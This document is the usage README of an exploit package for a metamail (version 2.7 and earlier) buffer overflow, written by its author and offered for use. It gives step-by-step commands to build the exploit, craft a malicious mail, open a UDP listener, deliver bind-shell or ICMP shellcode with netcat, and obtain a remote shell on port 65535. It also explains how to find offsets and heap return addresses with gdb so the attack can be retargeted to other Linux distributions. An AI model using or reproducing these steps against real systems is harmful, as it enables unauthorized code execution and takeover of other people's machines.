//////////////////// priestmasters metamail <= 2.7 exploit /////////////////////
/////////////////////// <priest@priestmaster.org> /////////////////////////////
///////////////////// http://www.priestmaster.org /////////////////////////////

* How to use this exploit ?

This exploit exploits the metamail buffer overflow vuln. Thanks to
Ulf metaur for the proof of concept exploit. Compile it with

- gcc metaexpl.c -o metaexpl

and launch it with

- ./metaexpl align retaddr

The output is a specially crafted mail. Pipe it to a file and lauch metamail.
Example:

- ./metaexpl 0 0x8054050 > mail
- metamail mail

If you have the correct align and retaddr. You should have an open udp port
at 13330. Search for it with:

- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address           Foreign Address         State
- udp        0      0 *:13330                 *:*

Now you can send your shellcode to port 13330
I add two shellcodes to my exploit. One is a portbind tcp port 65535 code and
the other code use icmp and the ping utillity to lauch code. You can send it
with:

- cat bindsockshc | netcat -u yourip 13330

or 

- cat icmpshc | netcat -u yourip 13330

Now telnet to ipadaddr and port 65535 if, you use bind shellcode:

- telnet ipaddr 65535
- Trying ::1...
- telnet: connect to address ::1: Connection refused
- Trying 127.0.0.1...
- Connected to localhost.
- Escape character is '^]'.
- id;
- uid=100(hack) gid=100(users) groups=100(users)
- : command not found

For icmp shellcode look at icmp.c file in this package.

----------------------

* How can i find the correct offset for other linux distributions ?

Align 0 and Return address 0x8054050 works for German SUSE Linux 7.0. The 
target is in the file "targets" in this package. Pleae send me the targets of
your linux distributions. If you want to exploit another distribution, you need
another align and return address. Launch exploit with align 0 and any 
return address.

- ./metaexpl 1 0x41424344 > /tmp/mail

Now open gdb with metamail executable and launch it with mail

- gdb metamail
- (gdb)
- (gdb) r mail
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x68726979 in ?? ()

You have the wrong offset. Switch to another terminal and create a new mail
with another offset. Positive and negative values are allowed.  

- ./metaexpl 2 0x41424344 > /tmp/mail

Now in gdb:

- (gdb) r mail
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x61626364 in ?? ()
- (gdb)

Yeah !!! Now we have the correct offset (ABCD is normally \x41\x42\x43\x44 in
hex, but metamail adds 0x20 to it). Let's search for the return address
(the return address is located at heap):

- maintenance info sections
- ...
- 0x08053080->0x08053450 at 0x0000a080: .data ALLOC LOAD DATA HAS_CONTENTS
- 0x08053450->0x08053454 at 0x0000a450: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
- 0x08053454->0x0805345c at 0x0000a454: .ctors ALLOC LOAD DATA HAS_CONTENTS
- 0x0805345c->0x08053464 at 0x0000a45c: .dtors ALLOC LOAD DATA HAS_CONTENTS
- 0x08053464->0x08053558 at 0x0000a464: .got ALLOC LOAD DATA HAS_CONTENTS
- 0x08053558->0x080535f8 at 0x0000a558: .dynamic ALLOC LOAD DATA HAS_CONTENTS
- 0x08053600->0x08053e50 at 0x0000a600: .bss ALLOC
- 0x00000000->0x0000017c at 0x0000a600: .comment READONLY HAS_CONTENTS
- 0x08053e50->0x08053f18 at 0x0000a77c: .note READONLY HAS_CONTENTS
-             ^^^^^^^^^^

Now search for the nops (The heap is after 0x08053f18):

- (gdb) x/1000x 0x08053f18
- 0x8053f18:      0x08053f68      0xffffffff      0xffffffff      0x00000000
- 0x8053f28:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f38:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f48:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f58:      0x00000000      0x00000000      0x00000000      0x400f5d80
- 0x8053f68:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f78:      0x00000000      0x00000000      0x00000000      0x000003f1
- 0x8053f88:      0x485f4d4d      0x45444145      0x0a3d5352      0x6d6f7246
- 0x8053f98:      0x3f3d203a      0x47474747      0x47474747      0x47474747
- 0x8053fa8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fb8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fc8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fd8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fe8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053ff8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8054008:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8054018:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8054028:      0x47474747      0x47474747      0x47474747      0x47474747
- ...

0x47474747 are the nops. All addresses with 0x47474747 are valid return
addressees. Take an address in the middle of the nop buffer. 0x8053fc8
is a good one for example. Ok, we have our values. We can exploit it:

- metaexpl 2 0x8053fc8 > /tmp/mail
- metamail /tmp/mail
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address           Foreign Address         State
- udp        0      0 *:13330                 *:*

If you have questions, targets or anything other, mail me 

<priest@priestmaster.org>.  

Happy hacking

priestmaster
